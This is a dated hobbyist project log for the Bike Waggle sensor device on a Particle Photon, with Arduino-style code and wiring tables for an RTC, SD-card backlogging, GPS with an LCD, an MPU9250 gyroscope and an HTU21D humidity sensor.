The Bike Waggle photon uses the [PCF8523](https://www.adafruit.com/product/3295) as its RTC clock. Luckily the *RTClibrary* has an example dedicated towards the Adafruit device. The said code can be found [here](https://build.particle.io/libs/RTClibrary/1.2.1/tab/example/pcf8523.ino). Based off the given code a separate base code for the RTC functionality is written.
```
// Date and time functions using a DS1307 RTC connected via I2C and Wire lib
#include <Wire.h>
#include "RTClibrary.h"
RTC_PCF8523 rtc;
//char daysOfTheWeek[7][12] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};
// Initializing the Serial
void Initialize_Serial(){
while (!Serial) {
delay(1);
}
Serial.begin(57600);
}
void Initialize_RTC(){
if (! rtc.begin()) {
Serial.println("Couldn't find RTC");
while (1);
}
if (! rtc.initialized()) {
Serial.println("RTC is NOT running!");
}
}
void Update_RTC(){
// Update the RTC
if (Particle.connected()){
rtc.adjust(DateTime(Time.year(), Time.month(), Time.day(), Time.hour(), Time.minute(), Time.second()));
}
}
void Display_Date_Time(){
DateTime now = rtc.now();
Serial.print(now.year(), DEC);
Serial.print('/');
Serial.print(now.month(), DEC);
Serial.print('/');
Serial.print(now.day(), DEC);
Serial.print("-");
//Serial.print(daysOfTheWeek[now.dayOfTheWeek()]);
//Serial.print(") ");
Serial.print(now.hour(), DEC);
Serial.print(':');
Serial.print(now.minute(), DEC);
Serial.print(':');
Serial.print(now.second(), DEC);
Serial.println();
}
void setup () {
Initialize_Serial();
Initialize_RTC();
// Everytime the Particle is Turned on the RTC is Updated
Update_RTC();
}
void loop () {
Display_Date_Time();
delay(5000);
}
```
The code given initially updates the RTC via the Particle cloud, and on each loop it reads off the current time via the on-board RTC. As such the device will work even without Wi-Fi connectivity.
Since the RTC works off an I<sup>2</sup>C interface, it utilizes the D0 and the D1 pins of the Photon.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN/3V3 | VCC |
| GND | GND |
## July 26-27
### Task 21 - Lookback at the SD card Logger
On the particle photon a string variable can only hold maximum string length of 622 bytes. If Wi-Fi connectivity is out for a considerable amount of time, the string variable keeping the data may run out of space. As such it was decided that the back logged data should be saved within the SD Card.
However this brought up a couple of serious problems. The *SdFat* library, or any other library used for SD card data logging on the Photon, did not allow manipulation of written data within SD card text files. As such it was nearly impossible to save all backlogged data within one text file (no way of deleting published data). The only possibility was to save each sensorgram packet in different text files defined with respect to an index which reflects the time of creation.
This in turn demanded two other text files to keep the last published index of a sensorgram packet as well as the last index backlogged within the SD card.
Each time backlogged data is being published to the cloud, the text file which held the sensorgram packet will be deleted. In turn, the index file holding the last published sensorgram packet will be updated.
The base code for the SDCard check is as follows.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "SdFat.h"
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
//------------------------------------------------------------------------------
// Setup SPI configuration.
#if SPI_CONFIGURATION == 0
// Primary SPI with DMA
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFat sd;
const uint8_t chipSelect = A2;
#elif SPI_CONFIGURATION == 1
// Secondary SPI with DMA
// SCK => D4, MISO => D3, MOSI => D2, SS => D1
SdFat sd(1);
const uint8_t chipSelect = D1;
#elif SPI_CONFIGURATION == 2
// Primary SPI with Arduino SPI library style byte I/O.
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFatLibSpi sd;
const uint8_t chipSelect = SS;
#elif SPI_CONFIGURATION == 3
// Software SPI. Use any digital pins.
// MISO => D5, MOSI => D6, SCK => D7, SS => D0
SdFatSoftSpi<D5, D6, D7> sd;
const uint8_t chipSelect = D0;
#endif // SPI_CONFIGURATION
//------------------------------------------------------------------------------
File myFile;
File myFile2;
size_t n;
int lk=1;
int num_of_logs=0;
String Next_Publish_Index ;
void Initialize_Serial(){
Serial.begin(9600);
// Wait for USB Serial
while (!Serial) {
SysCall::yield();
}
}
void Initialize_SD(){
// Use half speed like the native library.
// Change to SPI_FULL_SPEED for more performance.
if (!sd.begin(chipSelect, SPI_HALF_SPEED)) {
sd.initErrorHalt();
}
}
void Initialize_Backlogger(){
// Create a file in Folder1 using a path.
if (!sd.mkdir("Backlogs")) {
Serial.println("Backlogs not created");
}
if (!myFile.open("Backlogs/Index_File.txt", O_CREAT | O_WRITE | O_AT_END)) {
Serial.println("File Opening Failed");
}else{
// if the file opened okay, write to it:
Serial.println("Index_Created");
myFile.println("1");
myFile.close();
}
}
void Create_Initial_Logger_Files(){
// Create a file in Folder1 using a path.
for (int e = 1; e < 10; e++) {
Create_Text_Files("Backlogs/Backlog_Num_"+String(e)+".txt", "Sensogram_"+String(e));
delay(1000);
}
}
void Create_Text_Files(String Text_Name,String Text_Data){
// Create a file in Folder1 using a path.
if (!myFile.open(Text_Name, O_CREAT | O_WRITE | O_AT_END)) {
Serial.println("File Creation Failed");
}else{
// if the file opened okay, write to it:
Serial.println("File Created, Putting Text");
myFile.println(Text_Data);
myFile.close();
}
}
String Backlog_Read(String File_Index){
// re-open the file for reading:
String Read_Data ;
//Particle.publish("Index begining",File_Index.replace("\r",""));
Particle.publish("BR",File_Index);
Particle.publish("br2","Backlogs/Backlog_Num_"+ File_Index +".txt");
if (!myFile.open("Backlogs/Backlog_Num_"+ File_Index +".txt", O_READ)) {
sd.errorHalt("opening test.txt for read failed");
Read_Data = "# No Data Available";
}else{
Particle.publish("br3","Reading_Data_Log_inback log");
Read_Data = myFile.readStringUntil('\n');
myFile.close();
Particle.publish("BR4",Read_Data);
}
return Read_Data;
}
void Sensogram_Publisher()
{
// Read index from the Index File
if(!myFile.open("Backlogs/Index_File.txt", O_READ))
{
sd.errorHalt("opening test.txt for read failed");
}else
{
Serial.println("Reading_Index in");
Next_Publish_Index = (myFile.readStringUntil('\n')).replace("\r","");
myFile.close();
Serial.println(Next_Publish_Index);
String Sen = Backlog_Read(String(Next_Publish_Index));
Particle.publish("Index",Next_Publish_Index);
delay(2000);
Particle.publish("Sensorgram",Sen);
//Serial.println(Sen);
// Getting the Data
if(Particle.publish("Lakitha",Sen))
{
//Deleting Text File
// Remove files from current directory.
if (sd.remove("Backlogs/Index_File.txt") && sd.remove("Backlogs/Backlog_Num_"+ Next_Publish_Index +".txt"))
{
Serial.println("Files Removed, Recretaing Index");
//Recreating Index
if (!myFile.open("Backlogs/Index_File.txt", O_CREAT | O_WRITE | O_AT_END))
{
Serial.println("File Opening Failed");
}else{
// if the file opened okay, write to it:
Serial.println("Index_Created");
myFile.println(String(Next_Publish_Index.toInt()+1));
myFile.close();
}
}
}
}
}
void setup() {
// delay(1000);
// // Initialise Serail Communication
Initialize_Serial();
delay(10000);
Initialize_SD();
// delay(1000);
// Initialize_Backlogger();
// delay(5000);
// Create_Initial_Logger_Files();
// // Read Logger Files
//Backlog_Read("5");
delay(1000);
Sensogram_Publisher();
//Index_Updater();
}
void loop() {
}
```
Make sure to add another text file to save the number of created sensorgram packets.
**This method maybe too aggressive on the battery. The Bike Waggle may need to be switched off with care due to this addition**
## July 30-31
### Task 22 - Setting up the GPS
Setting up the GPS was somewhat troublesome since debugging is usually done indoors. The GPS had to be taken out to check if the code was properly functional. As such a module was written to utilize the LCD together with the GPS. The following code demonstrates that.
```
// This #include statement was automatically added by the Particle IDE.
#include <Particle-GPS.h>
// This #include statement was automatically added by the Particle IDE.
#include <LiquidCrystal_I2C_Spark.h>
#include "Particle-GPS.h"
SYSTEM_MODE(SEMI_AUTOMATIC)
SYSTEM_THREAD(ENABLED)
const uint32_t msRetryDelay = 2*60000; // retry every 5min
const uint32_t msRetryTime = 30000; // stop trying after 30sec
bool retryRunning = false;
Timer retryTimer(msRetryDelay, retryConnect); // timer to retry connecting
Timer stopTimer(msRetryTime, stopConnect); // timer to stop a long running try
// ***
// *** Create a Gps instance. The RX an TX pins are connected to
// *** the TX and RX pins on the electron (Serial1).
// ***
Gps _gps = Gps(&Serial1);
LiquidCrystal_I2C *lcd;
// ***
// *** Create a timer that fires every 1 ms to capture
// *** incoming serial port data from the GPS.
// ***
Timer _timer = Timer(1, onSerialData);
void retryConnect()
{
if (!Particle.connected()) // if not connected to cloud
{
Serial.println("reconnect");
stopTimer.start(); // set of the timout time
WiFi.on();
Particle.connect(); // start a reconnectino attempt
}
else // if already connected
{
Serial.println("connected");
retryTimer.stop(); // no further attempts required
retryRunning = false;
}
}
void stopConnect()
{
Serial.println("stopped");
if (!Particle.connected()) // if after retryTime no connection
WiFi.off(); // stop trying and swith off WiFi
stopTimer.stop();
}
// ------------------------------------------------------------------
// Boot animation for the 20x4 LCD: "BIKE WAGGLE" splash, four full
// width '#' column sweeps (left-right / right-left, twice), the
// splash again, and finally the firmware banner.
// The original had the sweep loop copy-pasted four times; the loops
// are factored into helpers with identical behavior.
// ------------------------------------------------------------------

// Draw a full-height '#' column at `col`, hold it for 40 ms, clear.
static void _lcdColumn(int col)
{
    lcd->setCursor(col /*columns*/, 0 /*rows*/);
    lcd->print("#");
    lcd->setCursor(col /*columns*/, 1 /*rows*/);
    lcd->print("#");
    lcd->setCursor(col /*columns*/, 2 /*rows*/);
    lcd->print("#");
    lcd->setCursor(col /*columns*/, 3 /*rows*/);
    lcd->print("#");
    delay(40);
    lcd->clear();
}

// Sweep the '#' column across all 20 columns in the given direction.
static void _lcdSweep(bool leftToRight)
{
    if (leftToRight) {
        for (int col = 0; col <= 19; col++) _lcdColumn(col);
    } else {
        for (int col = 19; col >= 0; col--) _lcdColumn(col);
    }
}

// Show the two-line "BIKE" / "WAGGLE" splash (1 s per line), then clear.
static void _lcdSplash()
{
    lcd->setCursor(5 /*columns*/, 1 /*rows*/);
    lcd->print("BIKE");
    delay(1000);
    lcd->setCursor(8 /*columns*/, 2 /*rows*/);
    lcd->print("WAGGLE");
    delay(1000);
    lcd->clear();
}

void startupLCD(){
    _lcdSplash();
    _lcdSweep(true);
    _lcdSweep(false);
    _lcdSweep(true);
    _lcdSweep(false);
    _lcdSplash();
    // Firmware banner
    lcd->setCursor(0 /*columns*/, 0 /*rows*/);
    lcd->print("Project Bike Waggle");
    lcd->setCursor(0 /*columns*/, 1 /*rows*/);
    lcd->print("Version 1.0");
    lcd->setCursor(0 /*columns*/, 2 /*rows*/);
    lcd->print("Initializing");
    lcd->setCursor(3 /*columns*/, 3 /*rows*/);
    lcd->print("Lakithas Photon");
    delay(1000);
    lcd->clear();
}
// Parse the latest $GPGGA and $GPRMC sentences from the GPS, dump every
// field to the USB serial console, and show Lat/Lon/Alt/Speed on the
// four rows of the LCD.
void OperationalLCD(){
Gga gga = Gga(_gps);
gga.parse();
Serial.println("2) Global Positioning System Fixed Data ($GPGGA)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(gga.utcTime);
Serial.print("Latitude: "); Serial.println(gga.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(gga.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(gga.longitude);
Serial.print("East/WestIndicator: "); Serial.println(gga.eastWestIndicator);
Serial.print("Position Fix Indicator: "); Serial.println(gga.positionFixIndicator);
Serial.print("Satellites Used: "); Serial.println(gga.satellitesUsed);
Serial.print("Horizontal Dilution of Precision: "); Serial.println(gga.hdop);
Serial.print("Altitude: "); Serial.print(gga.altitude); Serial.print(" "); Serial.println(gga.altitudeUnit);
Serial.print("Geoidal Separation: "); Serial.print(gga.geoidalSeparation); Serial.print(" "); Serial.println(gga.geoidalSeparationUnit);
Serial.print("Age of Diff. Corr.: "); Serial.println(gga.ageOfDiffCorr);
Serial.println("");
// ***
// *** Get the Recommended Minimum Navigation Information ($GPRMC).
// ***
Rmc rmc = Rmc(_gps);
rmc.parse();
Serial.println("1) Recommended Minimum Navigation Information ($GPRMC)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(rmc.utcTime);
Serial.print("Latitude: "); Serial.println(rmc.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(rmc.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(rmc.longitude);
Serial.print("East/WestIndicator: "); Serial.println(rmc.eastWestIndicator);
Serial.print("Speed Over Ground: "); Serial.println(rmc.speedOverGround);
Serial.print("Course Over Ground: "); Serial.println(rmc.courseOverGround);
Serial.print("Date: "); Serial.println(rmc.date);
Serial.print("Magnetic Variation: "); Serial.print(rmc.magneticVariation); Serial.print(" "); Serial.println(rmc.magneticVariationDirection);
Serial.print("Mode: "); Serial.println(rmc.mode);
Serial.println("");
delay(1000);
// Format the four values for the 20x4 display, one per row.
String Latitude = String(rmc.latitude);
String Longitude = String(rmc.longitude);
String Altitude = String(gga.altitude) ;
String Speed = String(rmc.speedOverGround);
lcd->clear();
lcd->setCursor(0 /*columns*/,0/*rows*/);
lcd->print("Lat: "+Latitude);
lcd->setCursor(0 /*columns*/,1/*rows*/);
lcd->print("Lon: "+Longitude);
lcd->setCursor(0 /*columns*/,2/*rows*/);
lcd->print("Alt: "+Altitude);
lcd->setCursor(0 /*columns*/,3/*rows*/);
lcd->print("Spd: "+Speed);
delay(1000);
}
// Allocate and initialise the 20x4 I2C LCD, then run the boot animation.
void Initialize_LCD(){
// The address is typically 0x27. I2C Address: 0x3F
// https://www.sainsmart.com/new-sainsmart-iic-i2c-twi-1602-serial-lcd-module-display-for-arduino-uno-mega-r3.html
lcd = new LiquidCrystal_I2C(0x3F /*address*/, 20/*columns*/, 4/*rows*/);
lcd->init();
lcd->backlight();
lcd->clear();
startupLCD();
}
void setup()
{
delay(2000);
// ***
// *** Initialize the USB Serial for debugging.
// ***
Serial.begin();
Initialize_LCD();
Serial.println("Initializing...");
// ***
// *** Initialize the GPS.
// ***
_gps.begin(9600);
// ***
// *** Start the timer.
// ***
_timer.start();
lcd->clear();
lcd->setCursor(2 /*columns*/,1/*rows*/);
lcd->print("GPS Inititited");
}
void onSerialData()
{
_gps.onSerialData();
}
void loop()
{
Serial.print("Data[0] = "); Serial.println(_gps.data[0]);
Serial.print("Data[1] = "); Serial.println(_gps.data[1]);
Serial.print("Data[2] = "); Serial.println(_gps.data[2]);
Serial.print("Data[3] = "); Serial.println(_gps.data[3]);
Serial.print("Data[4] = "); Serial.println(_gps.data[4]);
Serial.print("Data[5] = "); Serial.println(_gps.data[5]);
Serial.print("Data[6] = "); Serial.println(_gps.data[6]);
Gga gga = Gga(_gps);
gga.parse();
Serial.println("2) Global Positioning System Fixed Data ($GPGGA)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(gga.utcTime);
Serial.print("Latitude: "); Serial.println(gga.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(gga.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(gga.longitude);
Serial.print("East/WestIndicator: "); Serial.println(gga.eastWestIndicator);
Serial.print("Position Fix Indicator: "); Serial.println(gga.positionFixIndicator);
Serial.print("Satellites Used: "); Serial.println(gga.satellitesUsed);
Serial.print("Horizontal Dilution of Precision: "); Serial.println(gga.hdop);
Serial.print("Altitude: "); Serial.print(gga.altitude); Serial.print(" "); Serial.println(gga.altitudeUnit);
Serial.print("Geoidal Separation: "); Serial.print(gga.geoidalSeparation); Serial.print(" "); Serial.println(gga.geoidalSeparationUnit);
Serial.print("Age of Diff. Corr.: "); Serial.println(gga.ageOfDiffCorr);
Serial.println("");
// ***
// *** Get the Recommended Minimum Navigation Information ($GPRMC).
// ***
Rmc rmc = Rmc(_gps);
rmc.parse();
Serial.println("1) Recommended Minimum Navigation Information ($GPRMC)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(rmc.utcTime);
Serial.print("Latitude: "); Serial.println(rmc.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(rmc.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(rmc.longitude);
Serial.print("East/WestIndicator: "); Serial.println(rmc.eastWestIndicator);
Serial.print("Speed Over Ground: "); Serial.println(rmc.speedOverGround);
Serial.print("Course Over Ground: "); Serial.println(rmc.courseOverGround);
Serial.print("Date: "); Serial.println(rmc.date);
Serial.print("Magnetic Variation: "); Serial.print(rmc.magneticVariation); Serial.print(" "); Serial.println(rmc.magneticVariationDirection);
Serial.print("Mode: "); Serial.println(rmc.mode);
Serial.println("");
OperationalLCD();
// Recheck Wifi Functions
if (!retryRunning && !Particle.connected())
{ // if we have not already scheduled a retry and are not connected
Serial.println("schedule");
stopTimer.start(); // set timeout for auto-retry by system
retryRunning = true;
retryTimer.start(); // schedula a retry
}
delay(2500);
}
```
The given code prints out the Speed, Longitude, Latitude and the Altitude of the device. The pin diagram for the device is given below.
| Photon | GPS |
|--------|-----|
| 3.3V | VCC |
| GND | GND |
| TX | RX |
| RX | TX |
## Aug 1-3
### Task 23 - Setting up the Gyroscope
For the gyroscope the following code was used to read data.
```
#include "quaternionFilters.h"
#include "MPU9250.h"
#define AHRS true // Set to false for basic data read
#define SerialDebug true // Set to true to get Serial output for debugging
MPU9250 myIMU;
// Verify communication with the MPU9250, run its self test, calibrate the
// gyro/accelerometer biases and initialise the AK8963 magnetometer.
void Initialize_Gyro(){
// Read the WHO_AM_I register, this is a good test of communication
byte c = myIMU.readByte(MPU9250_ADDRESS, WHO_AM_I_MPU9250);
if (c == 0x73) // NOTE(review): datasheet WHO_AM_I for the MPU-9250 is 0x71; this board answers 0x73 (MPU-9255 variant?) — confirm against the actual chip
{
Serial.print("Check 3");
Serial.println("MPU9250 is online...");
// Start by performing self test and reporting values
myIMU.MPU9250SelfTest(myIMU.SelfTest);
Serial.print("x-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[0],1); Serial.println("% of factory value");
Serial.print("y-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[1],1); Serial.println("% of factory value");
Serial.print("z-axis self test: acceleration trim within : ");
Serial.print(myIMU.SelfTest[2],1); Serial.println("% of factory value");
Serial.print("x-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[3],1); Serial.println("% of factory value");
Serial.print("y-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[4],1); Serial.println("% of factory value");
Serial.print("z-axis self test: gyration trim within : ");
Serial.print(myIMU.SelfTest[5],1); Serial.println("% of factory value");
// Calibrate gyro and accelerometers, load biases in bias registers
myIMU.calibrateMPU9250(myIMU.gyroBias, myIMU.accelBias);
myIMU.initMPU9250();
// Initialize device for active mode read of acclerometer, gyroscope, and
// temperature
Serial.println("MPU9250 initialized for active data mode....");
// Read the WHO_AM_I register of the magnetometer, this is a good test of
// communication
byte d = myIMU.readByte(AK8963_ADDRESS, WHO_AM_I_AK8963);
Serial.print("AK8963 "); Serial.print("I AM "); Serial.print(d, HEX);
Serial.print(" I should be "); Serial.println(0x48, HEX);
// Get magnetometer calibration from AK8963 ROM
myIMU.initAK8963(myIMU.magCalibration);
// Initialize device for active mode read of magnetometer
// Serial.println("Calibration values: ");
Serial.print("X-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[0], 2);
Serial.print("Y-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[1], 2);
Serial.print("Z-Axis sensitivity adjustment value ");
Serial.println(myIMU.magCalibration[2], 2);
} // if (c == 0x73)
else
{
Serial.print("Could not connect to MPU9250: 0x");
Serial.println(c, HEX);
// while(1) ; // Loop forever if communication doesn't happen
}
}// End Initialize Gyro
void Read_Gyro()
{
if (myIMU.readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)
{
myIMU.readAccelData(myIMU.accelCount); // Read the x/y/z adc values
myIMU.getAres();
// Now we'll calculate the accleration value into actual g's
// This depends on scale being set
myIMU.ax = (float)myIMU.accelCount[0]*myIMU.aRes; // - accelBias[0];
myIMU.ay = (float)myIMU.accelCount[1]*myIMU.aRes; // - accelBias[1];
myIMU.az = (float)myIMU.accelCount[2]*myIMU.aRes; // - accelBias[2];
myIMU.readGyroData(myIMU.gyroCount); // Read the x/y/z adc values
myIMU.getGres();
// Calculate the gyro value into actual degrees per second
// This depends on scale being set
myIMU.gx = (float)myIMU.gyroCount[0]*myIMU.gRes;
myIMU.gy = (float)myIMU.gyroCount[1]*myIMU.gRes;
myIMU.gz = (float)myIMU.gyroCount[2]*myIMU.gRes;
myIMU.readMagData(myIMU.magCount); // Read the x/y/z adc values
myIMU.getMres();
// User environmental x-axis correction in milliGauss, should be
// automatically calculated
myIMU.magbias[0] = +470.;
// User environmental x-axis correction in milliGauss TODO axis??
myIMU.magbias[1] = +120.;
// User environmental x-axis correction in milliGauss
myIMU.magbias[2] = +125.;
// Calculate the magnetometer values in milliGauss
// Include factory calibration per data sheet and user environmental
// corrections
// Get actual magnetometer value, this depends on scale being set
myIMU.mx = (float)myIMU.magCount[0]*myIMU.mRes*myIMU.magCalibration[0] -
myIMU.magbias[0];
myIMU.my = (float)myIMU.magCount[1]*myIMU.mRes*myIMU.magCalibration[1] -
myIMU.magbias[1];
myIMU.mz = (float)myIMU.magCount[2]*myIMU.mRes*myIMU.magCalibration[2] -
myIMU.magbias[2];
} // if (readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)
// Must be called before updating quaternions!
myIMU.updateTime();
// Sensors x (y)-axis of the accelerometer is aligned with the y (x)-axis of
// the magnetometer; the magnetometer z-axis (+ down) is opposite to z-axis
// (+ up) of accelerometer and gyro! We have to make some allowance for this
// orientationmismatch in feeding the output to the quaternion filter. For the
// MPU-9250, we have chosen a magnetic rotation that keeps the sensor forward
// along the x-axis just like in the LSM9DS0 sensor. This rotation can be
// modified to allow any convenient orientation convention. This is ok by
// aircraft orientation standards! Pass gyro rate as rad/s
// MadgwickQuaternionUpdate(ax, ay, az, gx*PI/180.0f, gy*PI/180.0f, gz*PI/180.0f, my, mx, mz);
MahonyQuaternionUpdate(myIMU.ax, myIMU.ay, myIMU.az, myIMU.gx*DEG_TO_RAD,
myIMU.gy*DEG_TO_RAD, myIMU.gz*DEG_TO_RAD, myIMU.my,
myIMU.mx, myIMU.mz, myIMU.deltat);
myIMU.delt_t = millis() - myIMU.count;
if (myIMU.delt_t > 500)
{
// Print acceleration values in milligs!
String Acclerartion_X = String(1000*myIMU.ax);
String Acclerartion_Y = String(1000*myIMU.ay);
String Acclerartion_Z = String(1000*myIMU.az);
String Orientation_X = String(myIMU.gx, 3);
String Orientation_Y = String(myIMU.gy, 3);
String Orientation_Z = String(myIMU.gz, 3);
String Temprature = String(((float) myIMU.tempCount) / 333.87 + 21.0);
Serial.print("X-acceleration: "); Serial.print(1000*myIMU.ax);
Serial.print(" mg ");
Serial.print("Y-acceleration: "); Serial.print(1000*myIMU.ay);
Serial.print(" mg ");
Serial.print("Z-acceleration: "); Serial.print(1000*myIMU.az);
Serial.println(" mg ");
// Print gyro values in degree/sec
Serial.print("X-gyro rate: "); Serial.print(myIMU.gx, 3);
Serial.print(" degrees/sec ");
Serial.print("Y-gyro rate: "); Serial.print(myIMU.gy, 3);
Serial.print(" degrees/sec ");
Serial.print("Z-gyro rate: "); Serial.print(myIMU.gz, 3);
Serial.println(" degrees/sec");
// Print mag values in degree/sec
Serial.print("X-mag field: "); Serial.print(myIMU.mx);
Serial.print(" mG ");
Serial.print("Y-mag field: "); Serial.print(myIMU.my);
Serial.print(" mG ");
Serial.print("Z-mag field: "); Serial.print(myIMU.mz);
Serial.println(" mG");
myIMU.tempCount = myIMU.readTempData(); // Read the adc values
// Temperature in degrees Centigrade
myIMU.temperature = ((float) myIMU.tempCount) / 333.87 + 21.0;
// Print temperature in degrees Centigrade
Serial.print("Temperature is "); Serial.print(myIMU.temperature, 1);
Serial.println(" degrees C");
// Define output variables from updated quaternion---these are Tait-Bryan
// angles, commonly used in aircraft orientation. In this coordinate system,
// the positive z-axis is down toward Earth. Yaw is the angle between Sensor
// x-axis and Earth magnetic North (or true North if corrected for local
// declination, looking down on the sensor positive yaw is counterclockwise.
// Pitch is angle between sensor x-axis and Earth ground plane, toward the
// Earth is positive, up toward the sky is negative. Roll is angle between
// sensor y-axis and Earth ground plane, y-axis up is positive roll. These
// arise from the definition of the homogeneous rotation matrix constructed
// from quaternions. Tait-Bryan angles as well as Euler angles are
// non-commutative; that is, the get the correct orientation the rotations
// must be applied in the correct order which for this configuration is yaw,
// pitch, and then roll.
// For more see
// http://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
// which has additional links.
myIMU.yaw = atan2(2.0f * (*(getQ()+1) * *(getQ()+2) + *getQ() *
*(getQ()+3)), *getQ() * *getQ() + *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) - *(getQ()+3) * *(getQ()+3));
myIMU.pitch = -asin(2.0f * (*(getQ()+1) * *(getQ()+3) - *getQ() *
*(getQ()+2)));
myIMU.roll = atan2(2.0f * (*getQ() * *(getQ()+1) + *(getQ()+2) *
*(getQ()+3)), *getQ() * *getQ() - *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) + *(getQ()+3) * *(getQ()+3));
myIMU.pitch *= RAD_TO_DEG;
myIMU.yaw *= RAD_TO_DEG;
// Declination of SparkFun Electronics (40°05'26.6"N 105°11'05.9"W) is
// 8° 30' E ± 0° 21' (or 8.5°) on 2016-07-19
// - http://www.ngdc.noaa.gov/geomag-web/#declination
myIMU.yaw -= 8.5;
myIMU.roll *= RAD_TO_DEG;
Serial.print("Yaw, Pitch, Roll: ");
Serial.print(myIMU.yaw, 2);
Serial.print(", ");
Serial.print(myIMU.pitch, 2);
Serial.print(", ");
Serial.println(myIMU.roll, 2);
Serial.print("rate = ");
Serial.print((float)myIMU.sumCount/myIMU.sum, 2);
Serial.println(" Hz");
// Print acceleration values in milligs!
String Euler_Yaw = String(myIMU.yaw, 2);
String Euler_Pitch = String(myIMU.pitch, 2);
String Euler_Roll = String(myIMU.roll, 2);
String Euler_Frequency = String((float)myIMU.sumCount/myIMU.sum, 2);
// String Orientation_X = String(myIMU.gx, 3);
// String Orientation_Y = String(myIMU.gy, 3);
// String Orientation_Z = String(myIMU.gz, 3);
myIMU.count = millis();
myIMU.sumCount = 0;
myIMU.sum = 0;
}
}
void setup()
{
Serial.begin(9600);
delay(10000);
Initialize_Gyro();
}
void loop()
{
Read_Gyro();
delay(5000);
// If intPin goes high, all data registers have new data
// On interrupt, check if data ready interrupt
}
```
The code resulted in outputting the 3-axis acceleration, 3-axis orientation, and 3-axis magnetic field readings. The following pin diagram was used.
| Due | MPU9250 | Description |
|------|---------|-------------|
| 5V | VCC | This board can also use 3.3V but first needs the solder jumper to be bridged, located next to the regulator.
| GND | GND |
| A1 | SCL | Pin 21 is the Due's default SCL pin
| A0 | SDA | Pin 20 is the Due's default SDA pin
| | EDA | Auxiliary pin, unused, frankly I did not figure out exactly what it does, very confident it's unused
| | ECL | Auxiliary pin, unused, frankly I did not figure out exactly what it does, very confident it's unused
| | AD0 | Changes the LSB of the address
| | INT | Interrupt output to controller, not used!
| 3V3 | NCS | Pull to high to enable I2C mode, to low for SPI
| GND | FSYNC | Frame sync, for use with a camera, not used! Should be grounded
## Aug 6
### Task 24 - Setting up the Temperature and Humidity Sensor
The HTU21D is another sensor which communicates using the I^2C Bus. The following code was implemented to get the Temperature and Humidity Readings.
```
// This #include statement was automatically added by the Particle IDE.
#include <HTU21D.h>
HTU21D htu = HTU21D();
// Taking care of the HTU sensor
// Probe the HTU21D over I2C and report the result on the serial console.
void Initialize_HTU21D(){
    bool sensorFound = htu.begin();
    if (sensorFound) {
        Serial.println("HTU21D OK");
    } else {
        Serial.println("HTU21D not found");
        delay(1000);
    }
}
// Print the current humidity and temperature readings to the serial console.
void Read_HTU21D(){
Serial.print("Hum:"); Serial.println(htu.readHumidity());
Serial.print("Temp:"); Serial.println(htu.readTemperature());
// Reading HTU21D data - temperature and humidity (scaling: "* 100" per the original note — TODO confirm)
}
void setup() {
Initialize_HTU21D();
}
void loop() {
Read_HTU21D();
delay(1000);
}
```
Since the HTU21D works off an I<sup>2</sup>C interface, it utilizes the D0 and the D1 pins of the Photon.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN/3V3 | VCC |
| GND | GND |
## Aug 7-8
### Task 25 - Running the Particle with a Collection of Sensors
Since many sensors have been tried out thus far, it was time to check whether they worked together on the Photon. The devices to be connected together for this iteration of the main code are listed here.
| Device | Serial data link | Device Address |
|--------|------------------|----------------|
| RTC(PCF8523) | I<sup>2</sup>C | 0x68 |
| LCD Module(Smraza 2004) | I<sup>2</sup>C | 0x3F |
| Gyroscope(MPU9250) | I<sup>2</sup>C | 0x68/0x69 |
| GPS(NEO-6M) | RS232 TTL | - |
| SD Module(Adafruit) | SPI | - |
| Temprature/Humidity(HTU2ID) | I<sup>2</sup>C | 0x40 |
| Battery Pack | - | - |
Unfortunately, in default settings both the RTC and the Gyroscope happened to have the same address. As such, the AD0 pin on the Gyroscope is pulled high to change its address to 0x69 (from 0x68). To cater for this modification, the code snippet taken from the initial MPU9250 code was revised.
The revision is stated below.
The library of the said sensor (SPARKFUN_MPU-9250) holds a file named *'MPU9250.h'*. This piece of code can be found there.
```
// Using the MPU-9250 breakout board, ADO is set to 0
// Seven-bit device address is 110100 for ADO = 0 and 110101 for ADO = 1
#define ADO 0
#if ADO
#define MPU9250_ADDRESS 0x69 // Device address when ADO = 1
#else
#define MPU9250_ADDRESS 0x68 // Device address when ADO = 0
#define AK8963_ADDRESS 0x0C // Address of magnetometer
#endif // AD0
```
Since this code is meant to be used on an Arduino, the following modification was done for it to run on the Photon.
```
// Using the MPU-9250 breakout board, ADO is set to 0
#define MPU9250_ADDRESS 0x69 //
#define AK8963_ADDRESS 0x0C // Address of magnetometer
```
